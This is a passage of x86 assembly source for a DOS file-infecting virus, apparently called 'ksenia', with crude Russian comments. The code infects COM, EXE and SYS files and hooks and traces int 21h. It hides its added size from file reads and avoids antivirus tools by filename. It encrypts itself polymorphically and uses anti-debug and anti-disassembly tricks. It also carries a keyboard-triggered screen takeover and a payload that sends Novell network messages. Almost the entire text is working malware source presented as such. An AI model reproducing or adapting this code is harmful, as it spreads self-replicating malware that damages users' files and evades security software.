▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; подпрограмма для проверки файла (bx=handle) на зараженность
; cf=1 если заражен
 inf?:
       pusha                    ; сохранить в стеке регистры
       push    ds es
       push    cs cs
       pop     ds es

       call    seeksave         ; сохраняем позицию lseek
       mov     cx,-1            ; двигаемся к началу подпрограммы "extra"
       mov     dx,-(eov-extra)  ; (по ней будем сверять)
       call    seekfrom_eof

       mov     ah,3fh           ; читаем подпрограмму в "buffer"
       mov     cx,(eov-extra)
       lea     dx,buffer
       call    int21
       call    restoreseek      ; восстановить позицию lseek
       xor     cx,ax            ; все прочиталось?
       jnz     not_infected

       lea     si,buffer
       lea     di,extra
       mov     cx,eov-extra
       cld
       repe     cmpsb
       jne      not_infected

 infected:
       stc
       pop     es ds
       popa
       ret

 not_infected:
       clc
       jmp      infected+1

; подпрограмма для выкапывания оригинального начала зараженной программы
; на входе: bx - handler
; на выходе: "buffer" с оригинальным расшифрованным началом
; сохраняет позицию lseek в файле

 load_original:
        pushall                 ; save all 16-bit registers (exc. SP)
        push    cs cs
        pop     ds es

        xor     cx,cx           ; remember the current lseek position
        xor     dx,dx
        call    seekfrom_cur
        push    ax dx

        mov     cx,-1            ; seek to the virus start (-vsize bytes
        mov     dx,-vsize        ; from end of file)
        call    seekfrom_eof     ;
        mov     ah,3fh           ; read virus body to the buffer
        mov     cx,vsize
        lea     dx,buffer
        call    int21

        pop     cx dx            ; восстанавливаем позицию lseek в
        call    seekfrom_bof     ; зараженной программе

        mov     byte ptr [buffer+(cr_ret-ksenia)],0cbh
        lea     ax,buffer
        cwd
        mov     cx,16
        div     cx
        mov     cx,cs
        add     ax,cx
        add     dx,crypt-ksenia
        push    cs offset retc
        push    ax dx
        retf

 retc:
        lea     si,[buffer+(original-ksenia)]
        lea     di,buffer
        mov     cx,28
        cld
        rep     movsb

        popall
        ret

; Хирургическая обработка прерывания int 21h
 cr21z:
       pusha                    ; сохранить регистры
       push    ds es
       push    cs cs
       pop     ds es

       in      al,40h
       sub     al,70h
       jnc     $-2
       add     al,80h+70h
       mov     splint,al

       mov     ah,25h
       lea     dx,tsr
       int     21h

       cmp     word ptr original,0ffffh
       jz      my_int
       mov     ax,1600h
       int     2fh
       or      al,al
       jz      no_win

 my_int:
       mov     ax,3521h
       int     21h
       mov     win21,bx
       mov     win21+2,es
       mov     ax,2521h
       lea     dx,win_trick
       int     21h
       jmp     motherfucker

 no_win:
       mov     si,30h*4         ; найти оригинальный вектор прерывания
 nextchain:                     ; int 21h
       cmp     byte ptr [si],0eah       ; прямой дальний джамп?
       jne     another_way
       lds     si,[si+1]                ; загрузить в ds:si ссылку джампа
       cmp     word ptr [si],9090h      ; там находятся 2 nop'а?
       jnz     nextchain
       sub     si,32h                   ; а если взять пораньше?
       cmp     word ptr [si],9090h      ; nop/nop
       je      gotreal                  ; call far [....]

 another_way:
       cmp     word ptr [si],2e1eh      ; push ds
       jne     motherfucker             ; cs:[...]?
       add     si,25h                   ; а дальше?
       cmp     word ptr [si],80fah      ; cli
       je      gotreal                  ; cmp ah,[..]

 motherfucker:                  ; че то меня понесло...
       push    0
       pop     ds
       lds     si,ds:[84h]      ; ладно, хуй с ним
 gotreal:
       mov     cs:io21,si       ; засовываем че нашли в ячейку памяти
       mov     cs:io21+2,ds
       mov     ax,ds:[si]       ; читаем 2 первые байта обработчика
       mov     cs:prev2,ax      ; сохраняем их

       push    cs
       pop     ds
       mov     ax,3501h
       int     21h
       mov     io1,bx
       mov     io1+2,es
       mov     ax,2501h
       lea     dx,trace
       int     21h

       pushf                    ; сохранить в стеке адрес
       push    cs               ; возврата
       push    offset trace_post

       pushf                    ; сохранить в стеке флаги со
       pop     ax               ; включенным битом трассировки
       or      ah,1
       push    ax
       push    dword ptr io21     ; и загрузить адрес 21-го обработчика
       mov     ah,30h             ; невинная функция dos
       iret                       ; перейти в режим трассировки

 trace_post:
       pop     es ds            ; здеся мы кончили...........
       popa
       ret

 trace:
       push    eax bp ds        ; трассировка 21-го

       mov     ax,cs:io21       ; взять смещение
       inc     ax
       mov     bp,sp
       cmp     [bp+8],ax        ; выполнились ли первые
       je      nextcmd          ; два байта обработчика?

       and     word ptr [bp+12],0feffh  ; убрать флаг трассировки
       mov     eax,[bp+8]               ; считать адрес следующей инструкции
       mov     dword ptr cs:_addr21,eax
       push    0                        ; ds=0
       pop     ds
       push    dword ptr cs:io1         ; восстановить 1-й вектор
       pop     dword ptr ds:[4]

 nextcmd:
       pop     ds bp eax       ; выход из прерывания
       iret                    ; трассировки

 ; Verifyes MCB owner
 verifymcb:
        pusha
        push    ds es

        mov     ah,62h          ; get current psp segment
        call    int21
        dec     bx              ; get mcb segment
        mov     ds,bx
        mov     si,08h          ; name of the owner
        lea     di,stdisable
 cmpchar:
        mov     al,[si]         ; get char of the owner name
        call    upreg
        cmp     al,cs:[di]
        jne     nextname
        or      al,al
        jz      the_same
        inc     si
        inc     di
        cmp     si,10h
        je      the_same
        jmp     cmpchar
  nextname:
        inc     di
        cmp     byte ptr cs:[di],0
        jne     nextname
        inc     di
        cmp     byte ptr cs:[di],0ffh
        je      the_different
        mov     si,08h
        jmp     cmpchar
 the_same:
        mov     cs:stf,1
        jmp     quitvmcb
 the_different:
        mov     cs:stf,0
 quitvmcb:
        pop     es ds
        popa
        ret
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; sys infection ── called by infect, [di] = buffer
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 sysinfect:
        cmp     word ptr [di],0ffffh
        jne     cierr
        call    seek2eof
        or      dx,dx
        jnz     cierr
        cmp     ax,65035-vsize
        ja      cierr
        mov     word ptr [di+8],ax
        add     ax,(strategy-ksenia)
        xchg    word ptr [di+6],ax
        mov     word ptr old_strategy,ax
        clc
        ret

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; com infection ── called by infect, [di] = buffer
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 cominfect:
        cmp     word ptr [di],0ffffh
        je      cierr
        mov     al,0e9h
        stosb
        call    seek2eof
        or      dx,dx
        jnz     cierr
        cmp     ax,65035-vsize
        ja      cierr
        sub     ax,3
        stosw
        clc
        ret
 cierr: stc
        ret

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; exe infection ── called by infect, [di] = buffer
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 exeinfect:
        cmp     byte ptr [di+18h],'@'   ; NExe?
        je      exerr

        mov     ax,512                  ; get file size from header
        mov     cx,word ptr [di+4]
        cmp     word ptr [di+2],0
        jz      $+3
        dec     cx
        mul     cx
        add     ax,word ptr [di+2]
        adc     dx,0
        xchg    ax,si
        xchg    dx,di

        call    seek2eof                ; and the real size
        cmp     ax,si                   ; compare its
        jne     exerr
        cmp     dx,di
        jne     exerr

        push    ax dx                   ; get location in exe file
        mov     cx,16
        div     cx
        sub     ax,word ptr buffer+8
        mov     word ptr buffer+14h,dx
        mov     word ptr buffer+16h,ax
        inc     ax                      ; special for TBAV
        mov     word ptr buffer+0eh,ax
        mov     word ptr buffer+10h,3000h
        pop     dx ax

        add     ax,vsize                ; get pages/lst page lenght
        adc     dx,0
        mov     cx,512
        div     cx
        or      dx,dx
        jz      $+3
        inc     ax
        mov     word ptr buffer+2,dx
        mov     word ptr buffer+4,ax
        clc
        ret

 exerr: stc
        ret


▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; Тестирует файл на предмет незаражаемости + виндоус изврат
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 filenamecheck:         pusha                  ; сохранить регистры
                        mov     si,dx          ; si=dx
                        dec     si             ; dec+inc=0
 findend:               inc     si             ; найти конец
                        cmp     byte ptr [si],0
                        jne     findend

 findname:              dec     si             ; decrease si
                        cmp     byte ptr [si],'\'
                        je      gotname
                        cmp     byte ptr [si],':'
                        je      gotname
                        cmp     si,dx
                        jae     findname
 gotname:               inc     si              ; si=filename
                        mov     ax,[si]         ; get first chars
                        call    upreg
                        cmp     ax,'IW'         ; Windows?
                        je      winfound

 otherfiles:            cmp     ax,'IF'         ; FindVirus?
                        je      badfile
                        cmp     ax,'CS'         ; Scan?
                        je      badfile
                        cmp     ax,'SV'         ; VSafe/VShield?
                        je      badfile
                        cmp     ax,'BT'         ; Fucked TBSCAN?
                        je      badfile
                        cmp     ax,'RD'         ; DRWEB?
                        je      badfile
                        cmp     ax,'VA'         ; AVP?
                        je      badfile
                        cmp     ax,'-F'         ; F-PROT?
                        je      badfile
                        cmp     ax,'PF'         ; FPROT?
                        je      badfile
                        cmp     ax,'DA'         ; ADInf?
                        je      badfile
                        cmp     ax,'OC'         ; COMMAND interpreter?
                        je      badfile

                        clc                     ; filename is okay
                        popa
                        ret

 badfile:               stc                     ; bad file...
                        popa
                        ret

 winfound:              cmp     cs:func_number,4b00h   ; windows: EXECUTE?
                        jne     otherfiles
                        mov     ax,[si+2]              ; get second two chars
                        call    upreg                  ; uppercase
                        cmp     ax,'.N'                ; wiN.?
                        jne     otherfiles
                        mov     ax,[si+4]       ; get third two chars
                        call    upreg
                        cmp     ax,'OC'         ; win.CO?
                        jne     otherfiles

                        push    ds es           ; widows executing:
                        mov     si,es:[bx+2]    ; offset of command line
                        mov     ax,es:[bx+4]    ; get segment =es=ds
                        mov     ds,ax
                        mov     es,ax
                        mov     di,si           ; ds:si=es:di=comline
                        inc     di
                        cld
                        cmp     byte ptr [si],0 ; no parameters entered?
                        je      writeparam
                        mov     al,0dh          ; search for the cr(lf)
                        mov     cx,127
                        repne   scasb
                        jne     noparam         ; error?
                        dec     di
 writeparam:            mov     cx,6
                        add     byte ptr [si],5 ; increase lenght of
                        push    cs              ; the command line
                        pop     ds
                        lea     si,wino32bit
                        rep     movsb           ; write new params...
 noparam:               pop     es ds
                        clc                     ; exit, file is okay!
                        popa
                        ret

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; Checks the handle (Disk file?)
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 handlecheck:           pusha
                        mov     ax,4400h
                        call    int21
                        jc      hcerr
                        test    dl,80h
                        jnz     hcerr
                        clc
                        popa
                        ret

 hcerr:                 stc
                        popa
                        ret

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; subroutine to decrease number of read bytes and remove lseek from virus zone
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 seekhide:              call    seek2eof
                        sub     ax,vsize
                        sbb     dx,0

                        cmp     dx,cs:seek_pos+2
                        jb      hidevirus
                        ja      not_us
                        cmp     ax,cs:seek_pos
                        jae     not_us

 hidevirus:             push    ax
                        sub     cs:seek_pos,ax
                        mov     ax,cs:seek_pos
                        sub     cs:nrbytes,ax  ; subtract number of read bytes
                        pop     ax
                        mov     cs:seek_pos,ax
                        mov     cs:seek_pos+2,dx

 not_us:                call    restoreseek
                        ret

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; lseek tools
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 seeksave:              pusha
                        xor     cx,cx
                        xor     dx,dx
                        call    seekfrom_cur
                        mov     cs:seek_pos,ax
                        mov     cs:seek_pos+2,dx
                        popa
                        ret

 restoreseek:           pusha
                        mov     dx,cs:seek_pos
                        mov     cx,cs:seek_pos+2
                        call    seekfrom_bof
                        popa
                        ret

 seek2bof:              mov     ax,4200h
                        xor     cx,cx
                        mov     dx,cx
                        jmp     realseek

 seek2eof:              mov     ax,4202h
                        xor     cx,cx
                        xor     dx,dx
                        jmp     realseek

 seekfrom_eof:          mov     ax,4202h
                        jmp     realseek

 seekfrom_cur:          mov     ax,4201h
                        jmp     realseek

 seekfrom_bof:          mov     ax,4200h

 realseek:              call    int21
                        ret

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; Upper case AX
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 upreg:                 cmp     al,61h
                        jb      goodchar
                        cmp     al,7ah
                        ja      goodchar
                        sub     al,20h
 goodchar:              cmp     ah,61h
                        jb      _good_
                        cmp     ah,7ah
                        ja      _good_
                        sub     ah,20h
 _good_:                ret

; ЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁ
; ЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁ Всякая хуйня для Novell Network ЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁ
; ЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁЁ
 novell:                pushall

                        mov     ax,7a00h        ; Novell installation check
                        int     2fh
                        or      al,al
                        jz      no_novell

                        mov     ax,2ah          ; Который час? (день..)
                        call    int21
                        cmp     al,1            ; Понедельник?
                        jne     no_novell

                        mov     ah,2ch          ; 5 минут нн-го?
                        call    int21
                        cmp     cl,5
                        jne     no_send

                        push    cs cs
                        pop     ds es
                        cld
                        in      al,40h          ; случайное число
                        and     al,111b         ; [0..7]
                        mov     word ptr buffer,9eh
                        mov     byte ptr buffer+2,0 ; послать сообщение
                        mov     byte ptr buffer+3,1 ; 1 connection
                        mov     byte ptr buffer+4,al ; connection #
                        mov     byte ptr buffer+5,endnmess-nmess ; длина мессаги
                        lea     si,nmess
                        lea     di,buffer+6
                        mov     cx,endnmess-nmess
                        rep     movsb

                        mov     ah,0e1h         ; отправить фак
                        lea     si,buffer
                        lea     si,two_bytes
                        call    int21

                        mov     cx,60
                        lea     di,buffer+4
 fake_down:             mov     byte ptr [di],10
                        inc     di
                        loop    fake_down
                        mov     word ptr buffer,3eh
                        mov     byte ptr buffer+2,9
                        mov     byte ptr buffer+3,3ch ; длина сообщения
                        lea     si,buffer
                        lea     di,two_bytes
                        mov     ah,0e1h
                        call    int21
                        jmp     no_novell

 no_send:               cmp     ch,17
                        jne     no_novell
                        mov     ah,0d7h
                        call    int21

 no_novell:             popall
                        ret

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; запись зашифрованного тела вируса в файл
; самое главное в этом вирусе (поставьте тута ret и все к е(и)бени матери)
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
  writevirus:
        mov     ax,5700h                ; запрос времени/даты последнего
        call    int21                   ; модифицирования файла
        push    dx cx                   ; сохранить в стеке

        mov     ah,2ch                  ; запрос текущего времени
        call    int21                   ; в dx:cx
        pop     ax                      ; восстановить в ax и сохранить снова
        push    ax                      ; время
        shr     ah,3                    ; берем часы (биты 11-15 в cx)
        cmp     ah,ch                   ; совпадают? если да, то съябываемся,
        je      write_fail              ; чтобы не засветиться

        call    seek2eof                ; а иначе идем в конец файла
        mov     ah,40h                  ; записываемся в файл
        mov     cx,vsize
        cwd
        call    crypt_int21_crypt       ; сначала зашифруемся
        xor     cx,ax                   ; все vsize байт записались?
        jnz     write_fail
        call    seek2bof                ; идем в начало
        mov     ah,40h                  ; записываем видоизмененный
        mov     cx,28                   ; заголовок com/exe файла
        lea     dx,buffer
        call    int21
  write_fail:
        pop     cx dx                   ; вынуть дату и время файла
        mov     ax,5701h                ; установить ее обратно
        call    int21
        ret

 MEM_ENC_END:

 ; Обработчик прерывания int 09h
 int9:  pusha                    ; сохранить используемые регистры
        push    ds cs            ; ds=cs
        pop     ds

        in      al,60h                 ; читать скан-код
        cmp     al,80h                 ; клавишу отпустили?
        jb      quit_9                 ; нет: выходим
        mov     si,point               ; иначе считаем текущий указатель
        cmp     [si],al                ; следующая буква подходит?
        jne     zero_pointer           ; нет: обнулить указатель и выйти
        inc     si                     ; подходит. инкрементировать указатель
        cmp     si,offset keyword+6    ; все 6 букв были нажаты?
        jb      save_it                ; нет: сохранить это значение

        mov     al,0ffh
        out     21h,al

        mov     ax,3
        int     10h

        push    cs
        pop     es
        lea     bp,smb_pattern
        mov     dx,'1'
 modify_keygen:
        mov     cx,1
        mov     ax,1100h
        mov     bx,0e00h
        int     10h
        add     bp,0eh
        inc     dx
        cmp     dx,'6'
        jne     modify_keygen

        mov     ah,1
        mov     ch,100000b
        int     10h

        mov     ax,0b800h
        mov     es,ax
        xor     si,si
        xor     di,di
        mov     cx,endcopy-copy

 Im_here:
        mov     al,cs:copy+si
        mov     ah,0ah
        mov     es:[di],ax
        inc     si
        inc     di
        inc     di
        loop    Im_here
        jmp     $

 zero_pointer:
        lea     si,keyword      ; обнуляем указатель
 save_it:
        mov     point,si        ; а тута сохраняем его
 quit_9:
        pop     ds              ; восстанавливаем всякое дерьмо
        popa
        jmp     dword ptr cs:io9

══════════════════════════════════════════════════════════════════════════════
 ireturn:
        call    restorehost             ; re-сплайсинг
        pop     word ptr cs:buffer      ; garbage
        pop     word ptr cs:buffer
        pop     word ptr cs:buffer
        retf    2

══════════════════════════════════════════════════════════════════════════════
 exithandler:
        push    si ds ax                ; сохранить регистры
        lds     si,dword ptr cs:_addr21 ; считать адрес
        mov     ah,cs:splint
        mov     al,0cdh
        xchg    ax,[si]
        mov     cs:keepword,ax
        pop     ax ds si
        mov     cs:resthost,1

        push    bp
        mov     bp,sp
        sub     word ptr [bp+2],2       ; откорректировать точку
        pop     bp                      ; возврата
        iret                            ; finita la comedia
                                        ; (вроде так)

══════════════════════════════════════════════════════════════════════════════
 restorehost:
        push    ds si ax                ; сохранить регистры
        lds     si,dword ptr cs:io21    ; дать адрес обработчика
        mov     ah,cs:splint
        mov     al,0cdh
        mov     [si],ax                 ; состосить вызов there
        pop     ax si ds                ; восситановить регистры
        ret

        db      4 dup (?)

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
; Подпрограмма за/раз-шифровки части вируса
; Использует XOR/ADD/SUB/NOT/INC/DEC/ROR/ROL/NEG шифровщики
; Случайный ключ
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
 crypt:
        pushf                           ; сохранить используемые регистры
        pusha
        push    ds

 foolsr:                                ; наебка для дизассемблера
        mov     ax,01ebh                ; перекрывающийся код
        mov     bx,02ebh
        nop
        mov     cx,3ebh
        nop
        nop
        mov     dx,4ebh
        nop
        nop
        nop
        mov     ax,2ebh
        jmp     foolsr+1

        call    extra                   ; вычислить экстра-смещение

        push    0                       ; наебка эвристика
        pop     ds
        mov     si,21h*4                ; будто terminate, а еще и антидЭбаг
        push    dword ptr [si]
        lea     ax,fool_antiv+bp
        push    cs ax
        pop     dword ptr [si]
        mov     ah,0b4h
        int     21h
 cc?:   cmp     dx,0fa01h
        je      $+30h

 fool_antiv:
        pop     ax bx dx
        pop     dword ptr [si]
        cmp     byte ptr cs:cc?+bp,0cch
        jne     bug

        int     19h

 bug:
        db      0b0h                    ; расшифровываем главный
 pre_ki db      000h                    ; механизм
        lea     si,crmain+bp
        mov     cx,endcr-crmain
 de_cr: xor     cs:[si],al              ; простым ксором
        inc     si
        loop    de_cr

 crmain:                                ; главный механизм
        jmp     overtable

 algorithm dw   9090h                   ; алгоритм
 crtable label  word                    ; таблица зашифровщиков
        xor     dl,cl
        add     dl,cl
        sub     dl,cl
        not     dl
        inc     dl
        dec     dl
        ror     dl,cl
        rol     dl,cl
        neg     dl

 decrtable label word                   ; таблица расшифровщиков
        xor     dl,cl
        sub     dl,cl
        add     dl,cl
        not     dl
        dec     dl
        inc     dl
        rol     dl,cl
        ror     dl,cl
        neg     dl

 overtable:
        db      0ebh,decrypt-overtable-2

        in      al,40h                  ; получить случайное число
        sub     al,9
        jnc     $-2
        add     al,9
        cbw
        add     ax,ax
        mov     si,ax

        mov     ax,cs:[crtable+si+bp]   ; взять зашифровщик
        mov     cs:[algorithm+bp],ax
        in      al,40h
        mov     cs:[value+bp],al
        mov     bx,si

 decrypt:
        mov     ax,cs:algorithm+bp
        mov     si,208h
        push    dword ptr [si]
        mov     word ptr [si],ax
        mov     byte ptr [si+2],0cbh
        xor     byte ptr cs:overtable+bp+1,decrypt-overtable-2

        lea     si,enc_start+bp          ; инициализация
        mov     cx,crypt-enc_start
        db      0b0h
 value  db      ?

 decrvirus:
        mov     dl,byte ptr cs:[si]     ; наконец-то!!!
        xor     al,cl
        xchg    al,cl
        db      09ah
        dw      208h,0
        xchg    al,cl
        mov     byte ptr cs:[si],dl
        inc     si
        loop    decrvirus
        pop     dword ptr ds:[208h]

 endcr: mov     si,bx
        mov     ax,word ptr cs:[decrtable+bp+si]
        mov     cs:[algorithm+bp],ax

        lea     si,crmain+bp    ; encrypt main engine
        mov     cx,endcr-crmain
        in      al,40h
        mov     cs:pre_ki+bp,al
 c2:    xor     cs:[si],al
        inc     si
        loop    c2

        pop     ds
        popa
        popf
 cr_ret:
        ret
 ;_________--------------________
 strategy:
        push    bp
        call    extra
        mov     cs:[req_head+bp],bx
        mov     cs:[req_head+bp+2],es
        pop     bp
        db      68h
 old_strategy   dw  ?
        ret

 win_trick:
        nop
        nop
        db      0eah
 win21  dw      ?,?


 int24h:
        db      0c0h,0e0h,10h           ; shl (или shr) al,10h => zero
        stc
        rcl     al,3                    ; получим al = 4
        dec     al
        iret                            ; ну заебенил !!!

 crypt_int21_crypt:
        call    crypt
        push    offset crypt
 int21:
        pushf                           ; вызов 21-го инта
        db     0ebh,3                   ; применил перекрывающийся код
        mov    ax,04ebh
        jmp    $-2
        dw     0ffffh
        db     09ah                     ; call far ptr ..
 io21   dw     ?,?
        ret

 extra:                                 ; вычисляем дополнительное смещение
        pushf
        push    eax
        db      66h,0b8h
        int     1ch
 subextr:
        jmp     $+4
        jmp     $-4
        mov     bp,sp                   ; считать вершину стека
        mov     bp,word ptr [bp-6]
        sub     bp,offset subextr
        pop     eax
        popf
        ret

 eov:

 io1                    dw      ?,?             ; убежище для векторов
 io9                    dw      ?,?
 io1c                   dw      ?,?
 io24                   dw      ?,?

 req_head               dw      ?,?
 point                  dw      ?               ; для обработчика int 09h
 resthost               db      ?
 _addr21                dw      ?,?
 splint                 db      ?
 keepword               dw      ?
 prev2                  dw      ?               ; начало 21-го обработчика
 stf                    db      ?               ; флаг для общего стелса
 drf                    db      ?               ; флаг для fcb стелса
 seek_pos               dw      ?,?             ; место хранения seekа
 nrbytes                dw      ?               ; тоже для считанных байт
 func_number            dw      ?
 func_jump              dw      ?
 two_bytes              dw      ?
 sys_sp                 dw      ?
 sys_ss                 dw      ?
 psp                    dw      ?

 buffer                 db      vsize dup (?)


 eom:                   end     ksenia

────────────────────────────────────────────────────────────────────────────────
